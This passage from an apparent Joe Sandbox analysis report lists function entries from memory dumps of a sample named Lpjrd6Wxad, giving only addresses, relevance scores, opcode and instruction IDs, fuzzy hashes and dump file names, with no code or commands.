                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d46b036f42aae0dfc51f04f1d9031b57f8ac79bab7176ab8b9032bd5c142f8a9
                                                                                                                                              • Instruction ID: 5b411513b28dea1ad67177906881a538fe5dbde49ea09fb8dea430ab533bec6b
                                                                                                                                              • Opcode Fuzzy Hash: d46b036f42aae0dfc51f04f1d9031b57f8ac79bab7176ab8b9032bd5c142f8a9
                                                                                                                                              • Instruction Fuzzy Hash: 5041E271E00258CBEB18DFAAC95469EBBF2AF89300F64C12AD819BB354DB345946CF44
                                                                                                                                              Function 0582D119 Relevance: .1, Instructions: 98COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4037774321.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5820000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e8f600391f1a61d3b6c51df1136fe1442514e062215df0a9f76f952038094eed
                                                                                                                                              • Instruction ID: 725520cf4200efcef52e6cb948fe16faf1852797edf29ad277516b6b86d5a226
                                                                                                                                              • Opcode Fuzzy Hash: e8f600391f1a61d3b6c51df1136fe1442514e062215df0a9f76f952038094eed
                                                                                                                                              • Instruction Fuzzy Hash: 4C410671E01258CBDB18DFAAD8546EDFBB2EF89300F20C12AD818BB254DB355946CF04
                                                                                                                                              Function 0582D571 Relevance: .1, Instructions: 97COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4037774321.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5820000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cd0b9faf64fdbbc3f217080d696a8ecc6386429a99748519f01288947f8b61bc
                                                                                                                                              • Instruction ID: 5c44278ba2a51105094e7d6f436ad53bf2a29e1f33e3e43be9ffbec2d54cab13
                                                                                                                                              • Opcode Fuzzy Hash: cd0b9faf64fdbbc3f217080d696a8ecc6386429a99748519f01288947f8b61bc
                                                                                                                                              • Instruction Fuzzy Hash: 3141F5B0E01218CBEB18DFAAC94469EBBF2AF89304F20C129D819BB254DB355946CF54
                                                                                                                                              Function 0582EB29 Relevance: .1, Instructions: 97COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4037774321.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5820000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 46c6bb075a5572158b436c3881815f33b13a4ad177a1216f59b1a5d4f6e236f3
                                                                                                                                              • Instruction ID: c815185a7f47920489b4801f956c5ba0ce75ecf648a11c3b625548c955d4d8b0
                                                                                                                                              • Opcode Fuzzy Hash: 46c6bb075a5572158b436c3881815f33b13a4ad177a1216f59b1a5d4f6e236f3
                                                                                                                                              • Instruction Fuzzy Hash: 1041F570E00258CBEB18DFAAD4446AEBBF2BF89304F20C12AD819BB254DB345946CF54
                                                                                                                                              Function 0582DE24 Relevance: .1, Instructions: 97COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4037774321.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5820000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 35237f4b5d3a06592f0f86c865142eb07f10e9940f0fb928c454619045560df3
                                                                                                                                              • Instruction ID: 882f4e58504de7ba9b02cdc22eb0e6a303464f799d1ab0edde6463d672d9ff00
                                                                                                                                              • Opcode Fuzzy Hash: 35237f4b5d3a06592f0f86c865142eb07f10e9940f0fb928c454619045560df3
                                                                                                                                              • Instruction Fuzzy Hash: 8F410374E002488FEB18DFAAD4546EEBBB2EF89300F20C12AD819BB254DB355946CF54
                                                                                                                                              Function 0582D9CB Relevance: .1, Instructions: 95COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4037774321.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5820000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 22f951dfca7f6829966a14ec5c6893199844d762fdfff765defac6ed3b4c6f1d
                                                                                                                                              • Instruction ID: 976a11494f40ab00880195357d063188d7a8fb4b4f4112c5a14f47c922bd3633
                                                                                                                                              • Opcode Fuzzy Hash: 22f951dfca7f6829966a14ec5c6893199844d762fdfff765defac6ed3b4c6f1d
                                                                                                                                              • Instruction Fuzzy Hash: E441E575E01218CBEB18DFAAD5547AEBBF2AF88300F24C12AD819BB254DB345946CF54
                                                                                                                                              Function 0582EF83 Relevance: .1, Instructions: 95COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4037774321.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5820000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 483c17860d0ce5118c0a3ea408664a8195bb39e52ba1d89ec72fbb3e7f9357dd
                                                                                                                                              • Instruction ID: 4f28babd7931a58735df5914ba7b3479c832530cb42b884f0a0afc2380fe1098
                                                                                                                                              • Opcode Fuzzy Hash: 483c17860d0ce5118c0a3ea408664a8195bb39e52ba1d89ec72fbb3e7f9357dd
                                                                                                                                              • Instruction Fuzzy Hash: 0541C575E01218CBDB18DFAAD9546ADFBB2BF88300F24C12AD819BB254DB345946CF54
                                                                                                                                              Function 0582E6D3 Relevance: .1, Instructions: 95COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4037774321.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5820000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9337d35a8ea459f46f1f4e3b8d02c180a4e43e4033f254be3713e040453b87ea
                                                                                                                                              • Instruction ID: 3d416408d47289fad0b3a890935c2f98452dd861cae18bf13d473983fd4374d3
                                                                                                                                              • Opcode Fuzzy Hash: 9337d35a8ea459f46f1f4e3b8d02c180a4e43e4033f254be3713e040453b87ea
                                                                                                                                              • Instruction Fuzzy Hash: 0841E575E00218CBEB18DFAAD5446AEBBF2FF88300F24C12AD819BB254DB355946CF44
                                                                                                                                              Function 0582F835 Relevance: .1, Instructions: 94COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4037774321.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5820000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c4c571bb52615cecf8a02a8acce3f7339137599119bc3825e674b0b23d85b56f
                                                                                                                                              • Instruction ID: 9be3c0ab8c3a90a880bf7fd8ccdea83ee88be504214432aad7a7abe7da2eb95f
                                                                                                                                              • Opcode Fuzzy Hash: c4c571bb52615cecf8a02a8acce3f7339137599119bc3825e674b0b23d85b56f
                                                                                                                                              • Instruction Fuzzy Hash: 7B41C475E01218CBEB18DFAAD95569EFBF2BF88300F20C12AD819BB254DB355946CF44
                                                                                                                                              Function 05828CC8 Relevance: .1, Instructions: 88COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4037774321.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5820000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4331e7f953d0867bdd69d9a2759edf70412205a3b574f8384bcd6ff397779573
                                                                                                                                              • Instruction ID: 1798dd984f02a0c5dbd1ac20938e4ec457f308f505f34755265c595a01c5de1a
                                                                                                                                              • Opcode Fuzzy Hash: 4331e7f953d0867bdd69d9a2759edf70412205a3b574f8384bcd6ff397779573
                                                                                                                                              • Instruction Fuzzy Hash: 1331E7B1D056289BEB18CFAAD9847DDFBF2BF88314F14C16AD418A72A4DB7019858F10
                                                                                                                                              Function 010239CD Relevance: .1, Instructions: 82COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3b86f948240a7f2d1354b5555fff1e06d71bfa44e1bc2881d3fe0f0846c395fb
                                                                                                                                              • Instruction ID: 707188d02ca6655829f04623a45e984a2cf6c70842f2870c82ca2dc1258ead1a
                                                                                                                                              • Opcode Fuzzy Hash: 3b86f948240a7f2d1354b5555fff1e06d71bfa44e1bc2881d3fe0f0846c395fb
                                                                                                                                              • Instruction Fuzzy Hash: EA3100324597D28BC3A7CF34C492593FFB1AE03224349C9DED8C5CD507E2295899D752